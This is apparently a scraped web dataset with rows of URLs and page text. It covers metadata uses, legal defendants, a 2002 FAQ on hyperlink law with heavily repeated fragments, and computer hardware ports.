descriptions of its scenes) is not directly understandable by a computer, but where an efficient search of the content is desirable. This is particularly useful in video applications such as Automatic Number Plate Recognition and Vehicle Recognition Identification software, wherein license plate data is saved and used to create reports and alerts. 42 There are 2 sources in which video metadata is derived: (1) operational gathered metadata, that is information about the content produced, such as the type of equipment, software, date, and location; (2) human-authored metadata, to improve search engine visibility, discoverability, audience engagement, and providing advertising opportunities to video publishers. 43 Avid's MetaSync and Adobe's Bridge are examples of professional video editing software with access to metadata. 44 Geospatial metadata relates to Geographic Information Systems (GIS) files, maps, images, and other data that is location-based. Metadata is used in GIS to document the characteristics and attributes of geographic data, such as database files and data that is developed within a GIS. It includes details like who developed the data, when it was collected, how it was processed, and what formats it's available in, and then delivers the context for the data to be used effectively. 45 Metadata can be created either by automated information processing or by manual work. Elementary metadata captured by computers can include information about when an object was created, who created it, when it was last updated, file size, and file extension. In this context an object refers to any of the following: A metadata engine collects, stores and analyzes information about data and metadata in use within a domain. 46 Data virtualization emerged in the 2000s as the new software technology to complete the virtualization "stack" in the enterprise. Metadata is used in data virtualization servers which are enterprise infrastructure components, alongside database and application servers. Metadata in these servers is saved as persistent repository and describe business objects in various enterprise systems and applications. Structural metadata commonality is also important to support data virtualization. Standardization and harmonization work has brought advantages to industry efforts to build metadata systems in the statistical community. 47 48 Several metadata guidelines and standards such as the European Statistics Code of Practice 49 and ISO 17369:2013 (Statistical Data and Metadata Exchange or SDMX) 47 provide key principles for how businesses, government bodies, and other entities should manage statistical data and metadata. Entities such as Eurostat, 50 European System of Central Banks, 50 and the U.S. Environmental Protection Agency 51 have implemented these and other such standards and guidelines with the goal of improving "efficiency when managing statistical business processes". 50 Metadata has been used in various ways as a means of cataloging items in libraries in both digital and analog formats. Such data helps classify, aggregate, identify, and locate a particular book, DVD, magazine, or any object a library might hold in its collection. 52 Until the 1980s, many library catalogs used 3x5 inch cards in file drawers to display a book's title, author, subject matter, and an abbreviated alpha-numeric string (call number) which indicated the physical location of the book within the library's shelves. The Dewey Decimal System employed by libraries for the classification of library materials by subject is an early example of metadata usage. The early paper catalog had information regarding whichever item was described on said card: title, author, subject, and a number as to where to find said item. 53 Beginning in the 1980s and 1990s, many libraries replaced these paper file cards with computer databases. These computer databases make it much easier and faster for users to do keyword searches. Another form of older metadata collection is the use by the US Census Bureau of what is known as the "Long Form". The Long Form asks questions that are used to create demographic data to find patterns of distribution. 54 Libraries employ metadata in library catalogues, most commonly as part of an Integrated Library Management System. Metadata is obtained by cataloging resources such as books, periodicals, DVDs, web pages or digital images. This data is stored in the integrated library management system, ILMS, using the MARC metadata standard. The purpose is to direct patrons to the physical or electronic location of items or areas they seek as well as to provide a description of the item s in question. More recent and specialized instances of library metadata include the establishment of digital libraries including e-print repositories and digital image libraries. While often based on library principles, the focus on non-librarian use, especially in providing metadata, means they do not follow traditional or common cataloging approaches. Given the custom nature of included materials, metadata fields are often specially created e.g. taxonomic classification fields, location fields, keywords, or copyright statement. Standard file information such as file size and format are usually automatically included. 55 Library operation has for decades been a key topic in efforts toward international standardization. Standards for metadata in digital libraries include Dublin Core, METS, MODS, DDI, DOI, URN, PREMIS schema, EML, and OAI-PMH. Leading libraries in the world give hints on their metadata standards strategies. 56 57 The use and creation of metadata in library and information science also include scientific publications: Metadata for scientific publications is often created by journal publishers and citation databases such as PubMed and Web of Science. The data contained within manuscripts or accompanying them as supplementary material is less often subject to metadata creation, 58 59 though they may be submitted to e.g. biomedical databases after publication. The original authors and database curators then become responsible for metadata creation, with the assistance of automated processes. Comprehensive metadata for all experimental data is the foundation of the FAIR Guiding Principles, or the standards for ensuring research data are findable, accessible, interoperable, and reusable. 60 Such metadata can then be utilized, complemented, and made accessible in useful ways. OpenAlex is a free online index of over 200 million scientific documents that integrates and provides metadata such as sources, citations, author information, scientific fields, and research topics. Its API and open source website can be used for metascience, scientometrics, and novel tools that query this semantic web of papers. 61 62 63 Another project under development, Scholia, uses the metadata of scientific publications for various visualizations and aggregation features such as providing a simple user interface summarizing literature about a specific feature of the SARS-CoV 2 virus using Wikidata's "main subject" property. 64 In research labor, transparent metadata about authors' contributions to works have been proposed e.g. the role played in the production of the paper, the level of contribution and the responsibilities. 65 66 Moreover, various metadata about scientific outputs can be created or complemented for instance, scite.ai attempts to track and link citations of papers as 'Supporting', 'Mentioning' or 'Contrasting' the study. 67 Other examples include developments of alternative metrics 68 which, beyond providing help for assessment and findability, also aggregate many of the public discussions about a scientific paper on social media such as Reddit, citations on Wikipedia, and reports about the study in the news media 69 and a call for showing whether or not the original findings are confirmed or could get reproduced. 70 71 Metadata in a museum context is the information that trained cultural documentation specialists, such as archivists, librarians, museum registrars and curators, create to index, structure, describe, identify, or otherwise specify works of art, architecture, cultural objects and their images. 72 73 74 Descriptive metadata is most commonly used in museum contexts for object identification and resource recovery purposes. 73 Metadata is developed and applied within collecting institutions and museums in order to: Many museums and cultural heritage centers recognize that given the diversity of artworks and cultural objects, no single model or standard suffices to describe and catalog cultural works. 72 73 74 For example, a sculpted Indigenous artifact could be classified as an artwork, an archaeological artifact, or an Indigenous heritage item. The early stages of standardization in archiving, description and cataloging within the museum community began in the late 1990s with the development of standards such as Categories for the Description of Works of Art (CDWA), Spectrum, CIDOC Conceptual Reference Model (CRM), Cataloging Cultural Objects (CCO) and the CDWA Lite XML schema. 73 These standards use HTML and XML markup languages for machine processing, publication and implementation. 73 The Anglo-American Cataloguing Rules (AACR), originally developed for characterizing books, have also been applied to cultural objects, works of art and architecture. 74 Standards, such as the CCO, are integrated within a Museum's Collections Management System (CMS), a database through which museums are able to manage their collections, acquisitions, loans and conservation. 74 Scholars and professionals in the field note that the "quickly evolving landscape of standards and technologies" creates challenges for cultural documentarians, specifically non-technically trained professionals. 75 page needed Most collecting institutions and museums use a relational database to categorize cultural works and their images. 74 Relational databases and metadata work to document and describe the complex relationships amongst cultural objects and multi-faceted works of art, as well as between objects and places, people, and artistic movements. 73 74 Relational database structures are also beneficial within collecting institutions and museums because they allow for archivists to make a clear distinction between cultural objects and their images; an unclear distinction could lead to confusing and inaccurate searches. 74 An object's materiality, function, and purpose, as well as the size (e.g., measurements, such as height, width, weight), storage requirements (e.g., climate-controlled environment), and focus of the museum and collection, influence the descriptive depth of the data attributed to the object by cultural documentarians. 74 The established institutional cataloging practices, goals, and expertise of cultural documentarians and database structure also influence the information ascribed to cultural objects and the ways in which cultural objects are categorized. 72 74 Additionally, museums often employ standardized commercial collection management software that prescribes and limits the ways in which archivists can describe artworks and cultural objects. 75 As well, collecting institutions and museums use Controlled Vocabularies to describe cultural objects and artworks in their collections. 73 74 Getty Vocabularies and the Library of Congress Controlled Vocabularies are reputable within the museum community and are recommended by CCO standards. 74 Museums are encouraged to use controlled vocabularies that are contextual and relevant to their collections and enhance the functionality of their digital information systems. 73 74 Controlled Vocabularies are beneficial within databases because they provide a high level of consistency, improving resource retrieval. 73 74 Metadata structures, including controlled vocabularies, reflect the ontologies of the systems from which they were created. Often the processes through which cultural objects are described and categorized through metadata in museums do not reflect the perspectives of the maker communities. 72 76 Metadata has been instrumental in the creation of digital information systems and archives within museums and has made it easier for museums to publish digital content online. This has enabled audiences who might not have had access to cultural objects due to geographic or economic barriers to have access to them. 73 In the 2000s, as more museums have adopted archival standards and created intricate databases, discussions about Linked Data between museum databases have come up in the museum, archival, and library science communities. 75 Collection Management Systems (CMS) and Digital Asset Management tools can be local or shared systems. 74 Digital Humanities scholars note many benefits of interoperability between museum databases and collections, while also acknowledging the difficulties of achieving such interoperability. 75 Problems involving metadata in litigation in the United States are becoming widespread. when? Courts have looked at various questions involving metadata, including the discoverability of metadata by parties. The Federal Rules of Civil Procedure have specific rules for discovery of electronically stored information, and subsequent case law applying those rules has elucidated on the litigant's duty to produce metadata when litigating in federal court. 77 In October 2009, the Arizona Supreme Court has ruled that metadata records are public record. 78 Document metadata have proven particularly important in legal environments in which litigation has requested metadata, that can include sensitive information detrimental to a certain party in court. Using metadata removal tools to "clean" or redact documents can mitigate the risks of unwittingly sending sensitive data. This process partially (see data remanence) protects law firms from potentially damaging leaking of sensitive data through electronic discovery. Opinion polls have shown that 45% of Americans are "not at all confident" in the ability of social media sites to ensure their personal data is secure and 40% say that social media sites should not be able to store any information on individuals. 76% of Americans say that they are not confident that the information advertising agencies collect on them is secure and 50% say that online advertising agencies should not be allowed to record any of their information at all. 79 In Australia, the need to strengthen national security has resulted in the introduction of a new metadata storage law. 80 This new law means that both security and policing agencies will be allowed to access up to 2 years of an individual's metadata, with the aim of making it easier to stop any terrorist attacks and serious crimes from happening. Legislative metadata has been the subject of some discussion in law.gov forums such as workshops held by the Legal Information Institute at the Cornell Law School on 22 and 23 March 2010. The documentation for these forums is titled, "Suggested metadata practices for legislation and regulations". 81 A handful of key points have been outlined by these discussions, section headings of which are listed as follows: Australian medical research pioneered the definition of metadata for applications in health care. That approach offers the first recognized attempt to adhere to international standards in medical sciences instead of defining a proprietary standard under the World Health Organization (WHO) umbrella. The medical community yet did not approve of the need to follow metadata standards despite research that supported these standards. 82 Research studies in the fields of biomedicine and molecular biology frequently yield large quantities of data, including results of genome or meta-genome sequencing, proteomics data, and even notes or plans created during the course of research itself. 83 Each data type involves its own variety of metadata and the processes necessary to produce these metadata. General metadata standards, such as ISA-Tab, 84 allow researchers to create and exchange experimental metadata in consistent formats. Specific experimental approaches frequently have their own metadata standards and systems: metadata standards for mass spectrometry include mzML 85 and SPLASH, 86 while XML-based standards such as PDBML 87 and SRA XML 88 serve as standards for macromolecular structure and sequencing data, respectively. The products of biomedical research are generally realized as peer-reviewed manuscripts and these publications are yet another source of data (see Science). A data warehouse (DW) is a repository of an organization's electronically stored data. Data warehouses are designed to manage and store the data. Data warehouses differ from business intelligence (BI) systems because BI systems are designed to use data to create reports and analyze the information, to provide strategic guidance to management. 89 Metadata is an important tool in how data is stored in data warehouses. The purpose of a data warehouse is to house standardized, structured, consistent, integrated, correct, "cleaned" and timely data, extracted from various operational systems in an organization. The extracted data are integrated in the data warehouse environment to provide an enterprise-wide perspective. Data are structured in a way to serve the reporting and analytic requirements. The design of structural metadata commonality using a data modeling method such as entity-relationship model diagramming is important in any data warehouse development effort. They detail metadata on each piece of data in the data warehouse. An essential component of a data warehouse business intelligence system is the metadata and tools to manage and retrieve the metadata. Ralph Kimball 90 describes metadata as the DNA of the data warehouse as metadata defines the elements of the data warehouse and how they work together. Kimball et al. 91 refers to 3 main categories of metadata: Technical metadata, business metadata and process metadata. Technical metadata is primarily definitional, while business metadata and process metadata is primarily descriptive. The categories sometimes overlap. The HTML format used to define web pages allows for the inclusion of a variety of types of metadata, from basic descriptive text, dates and keywords to further advanced metadata schemes such as the Dublin Core, e-GMS, and AGLS 92 standards. Pages and files can also be geotagged with coordinates, categorized or tagged, including collaboratively such as with folksonomies. When media has identifiers set or when such can be generated, information such as file tags and descriptions can be pulled or scraped from the Internet for example about movies. 93 Various online databases are aggregated and provide metadata for various data. The collaboratively built Wikidata has identifiers not just for media but also abstract concepts, various objects, and other entities, that can be looked up by humans and machines to retrieve useful information and to link knowledge in other knowledge bases and databases. 64 Metadata may be included in the page's header or in a separate file. Microformats allow metadata to be added to on-page data in a way that regular web users do not see, but computers, web crawlers and search engines can readily access. Many search engines are cautious about using metadata in their ranking algorithms because of exploitation of metadata and the practice of search engine optimization, SEO, to improve rankings. See the Meta element article for further discussion. This cautious attitude may be justified as people, according to Doctorow, 94 are not executing care and diligence when creating their own metadata and that metadata is part of a competitive environment where the metadata is used to promote the metadata creators own purposes. Studies show that search engines respond to web pages with metadata implementations, 95 and Google has an announcement on its site showing the meta tags that its search engine understands. 96 Enterprise search startup Swiftype recognizes metadata as a relevance signal that webmasters can implement for their website-specific search engine, even releasing their own extension, known as Meta Tags 2. 97 In the broadcast industry, metadata is linked to audio and video broadcast media to: This metadata can be linked to the video media thanks to the video servers. Most major broadcast sporting events like FIFA World Cup or the Olympic Games use this metadata to distribute their video content to TV stations through keywords. It is often the host broadcaster 98 who is in charge of organizing metadata through its International Broadcast Centre and its video servers. This metadata is recorded with the images and entered by metadata operators (loggers) who associate in live metadata available in metadata grids through software (such as Multicam(LSM) or IPDirector used during the FIFA World Cup or Olympic Games). 99 100 Metadata that describes geographic objects in electronic storage or format (such as datasets, maps, features, or documents with a geospatial component) has a history dating back to at least 1994. This class of metadata is described more fully on the geospatial metadata article. Ecological and environmental metadata is intended to document the "who, what, when, where, why, and how" of data collection for a particular study. This typically means which organization or institution collected the data, what type of data, which date(s) the data was collected, the rationale for the data collection, and the methodology used for the data collection. Metadata should be generated in a format commonly used by the most relevant science community, such as Darwin Core, Ecological Metadata Language, 101 or Dublin Core. Metadata editing tools exist to facilitate metadata generation (e.g. Metavist, 102 Mercury, Morpho 103 ). Metadata should describe the provenance of the data (where they originated, as well as any transformations the data underwent) and how to give credit for (cite) the data products. When first released in 1982, Compact Discs only contained a Table Of Contents (TOC) with the number of tracks on the disc and their length in samples. 104 105 Fourteen years later in 1996, a revision of the CD Red Book standard added CD-Text to carry additional metadata. 106 But CD-Text was not widely adopted. Shortly thereafter, it became common for personal computers to retrieve metadata from external sources (e.g. CDDB, Gracenote) based on the TOC. Digital audio formats such as digital audio files superseded music formats such as cassette tapes and CDs in the 2000s. Digital audio files could be labeled with more information than could be contained in just the file name. That descriptive information is called the audio tag or audio metadata in general. Computer programs specializing in adding or modifying this information are called tag editors. Metadata can be used to name, describe, catalog, and indicate ownership or copyright for a digital audio file, and its presence makes it much easier to locate a specific audio file within a group, typically through use of a search engine that accesses the metadata. As different digital audio formats were developed, attempts were made to standardize a specific location within the digital files where this information could be stored. As a result, almost all digital audio formats, including mp3, broadcast wav, and AIFF files, have similar standardized locations that can be populated with metadata. The metadata for compressed and uncompressed digital music is often encoded in the ID3 tag. Common editors such as TagLib support MP3, Ogg Vorbis, FLAC, MPC, Speex, WavPack TrueAudio, WAV, AIFF, MP4, and ASF file formats. With the availability of cloud applications, which include those to add metadata to content, metadata is increasingly available over the Internet. Metadata can be stored either internally, 107 in the same file or structure as the data (this is also called embedded metadata), or externally, in a separate file or field from the described data. A data repository typically stores the metadata detached from the data but can be designed to support embedded metadata approaches. Each option has advantages and disadvantages: Metadata can be stored in either human-readable or binary form. Storing metadata in a human-readable format such as XML can be useful because users can understand and edit it without specialized tools. 108 However, text-based formats are rarely optimized for storage capacity, communication time, or processing speed. A binary metadata format enables efficiency in all these respects, but requires special software to convert the binary information into human-readable content. Each relational database system has its own mechanisms for storing metadata. Examples of relational-database metadata include: In database terminology, this set of metadata is referred to as the catalog. The SQL standard specifies a uniform means to access the catalog, called the information schema, but not all databases implement it, even if they implement other aspects of the SQL standard. For an example of database-specific metadata access methods, see Oracle metadata. Programmatic access to metadata is possible using APIs such as JDBC, or SchemaCrawler. 109 One of the first satirical examinations of the concept of Metadata as we understand it today is American science fiction author Hal Draper's short story, "MS Fnd in a Lbry" (1961). Here, the knowledge of all Mankind is condensed into an object the size of a desk drawer, however, the magnitude of the metadata (e.g. catalog of catalogs of... , as well as indexes and histories) eventually leads to dire yet humorous consequences for the human race. The story prefigures the modern consequences of allowing metadata to become more important than the real data it is concerned with, and the risks inherent in that eventuality as a cautionary tale. |
203 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Defendant | In court proceedings, a defendant is a person or object who is the party either accused of committing a crime in criminal prosecution or against whom some type of civil relief is being sought in a civil case. Terminology varies from one jurisdiction to another. In Scots law, the terms "accused" or "panel" are used instead in criminal proceedings and "defender" in civil proceedings. 1 Another term in use is "respondent". In a criminal trial, a defendant is a person accused (charged) of committing an offense (a crime; an act defined as punishable under criminal law). The other party to a criminal trial is usually a public prosecutor, but in some jurisdictions, private prosecutions are allowed. Criminal defendants are often taken into custody by police and brought before a court under an arrest warrant. Criminal defendants are usually obliged to post bail before being released from custody. For serious cases, such as murder, bail may be refused. Defendants must be present at every stage of the proceedings against them. (There is an exception for very minor cases such as traffic offenses in jurisdictions which treat them as crimes.) If more than one person is accused, the people may be referred as "co-defendant" or "co-conspirator" in British and common law courts. In some jurisdictions, vulnerable defendants may be able to get access of services of a non-registered intermediary to assist with communication at court. 2 In a civil lawsuit, a defendant (or a respondent) is also the accused party, although not of an offense, but of a civil wrong (a tort or a breach of contract, for instance). The person who starts the civil action through filing a complaint is referred to as the plaintiff (also known as the appellant). Defendants in civil actions usually make their first court appearance voluntarily in response to a summons. Historically, civil defendants could be taken into custody under a writ of capias ad respondendum. Modern-day civil defendants are usually able to avoid most (if not all) court appearances if represented by a lawyer. Most often and familiarly, defendants are persons: either natural persons (actual human beings) or juridical persons (persona fiction) under the legal fiction of treating organizations as persons. But a defendant may be an object, in which case the object itself is the direct subject of the action. When a court has jurisdiction over an object, it is said to have jurisdiction in rem. An example of an in rem case is United States v. Forty Barrels and Twenty Kegs of Coca-Cola (1916), where the defendant was not the Coca-Cola Company itself, but rather "Forty Barrels and Twenty Kegs of Coca-Cola". In current United States legal practice, in rem suits are primarily asset forfeiture cases, based on drug laws, as in USA v. $124,700 (2006). Defendants can set up an account to pay for litigation costs and legal expenses. These legal defense funds can have large membership counts where members contribute to the fund. The fund can be public or private and is set up for individuals, organizations, or a particular purpose. These funds are often used by public officials, civil-rights organizations, and public-interest organizations. Historically when? , "defendant" was a legal term for a person prosecuted for misdemeanour. It was not applicable to a person prosecuted for felony. 3 |
204 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID460 | Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. top Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites. Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. top Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites. top Linking Patent Goes to Court, Reuters, February 7, 2002 Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002 Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002 Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more more Links and Law, Tim Berners-Lee (personal view) Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case) The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case) The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more more Frequently Asked Questions (and Answers) disclaimer privacy about us contacts |
205 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_port_(hardware) | A computer port is a hardware piece on a computer where an electrical connector can be plugged to link the device to external devices, such as another computer, a peripheral device or network equipment. 1 This is a non-standard term. Electronically, the several conductors where the port and cable contacts connect, provide a method to transfer data signals between devices. Bent pins are easier to replace on a cable than on a connector attached to a computer, so it was common to use female connectors for the fixed side of an interface. Computer ports in common use cover a wide variety of shapes such as round (PS 2, etc.), rectangular (FireWire, etc.), square (Telephone plug), trapezoidal (D-Sub — the old printer port was a DB 25), etc. There is some standardization to physical properties and function. For instance, most computers have a keyboard port (currently a Universal Serial Bus USB-like outlet referred to as USB Port), into which the keyboard is connected. Physically identical connectors may be used for widely different standards, especially on older personal computer systems, or systems not generally designed according to the current Microsoft Windows compatibility guides. For example, a 9 pin D-subminiature connector on the original IBM PC could have been used for monochrome video, color analog video (in two incompatible standards), a joystick interface, or a MIDI musical instrument digital control interface. The original IBM PC also had two identical 5 pin DIN connectors, one used for the keyboard, the second for a cassette recorder interface; the two were not interchangeable. The smaller mini-DIN connector has been variously used for the keyboard and two different kinds of mouse; older Macintosh family computers used the mini-DIN for a serial port or for a keyboard connector with different standards than the IBM-descended systems. Electronically, hardware ports can almost always be divided into two groups based on the signal transfer: After ports are connected, they typically require handshaking, where transfer type, transfer rate, and other necessary information is shared before data is sent. Hot-swappable ports can be connected while equipment is running. Almost all ports on personal computers are hot-swappable. Plug-and-play ports are designed so that the connected devices automatically start handshaking as soon as the hot-swapping is done. USB ports and FireWire ports are plug-and-play. Auto-detect or auto-detection ports are usually plug-and-play, but they offer another type of convenience. An auto-detect port may automatically determine what kind of device has been attached, but it also determines what purpose the port itself should have. For example, some sound cards allow plugging in several different types of audio speakers; then a dialogue box pops up on the computer screen asking whether the speaker is left, right, front, or rear for surround sound installations. The user's response determines the purpose of the port, which is physically a 1 8" tip-ring-sleeve mini jack. Some auto-detect ports can even switch between input and output based on context. As of 2006, manufacturers have nearly standardized colors associated with ports on personal computers, although there are no guarantees. The following is a short list: Additionally, USB ports are color-coded according to the specification and data transfer speed, e.g. USB 1.x and 2.x ports are usually white or black, and USB 3.0 ones are blue. SuperSpeed connectors are teal in color. 2 FireWire ports used with video equipment (among other devices) can be either 4 pin or 6 pin. The two extra conductors in the 6 pin connection carry electrical power. This is why a self-powered device such as a camcorder often connects with a cable that is 4 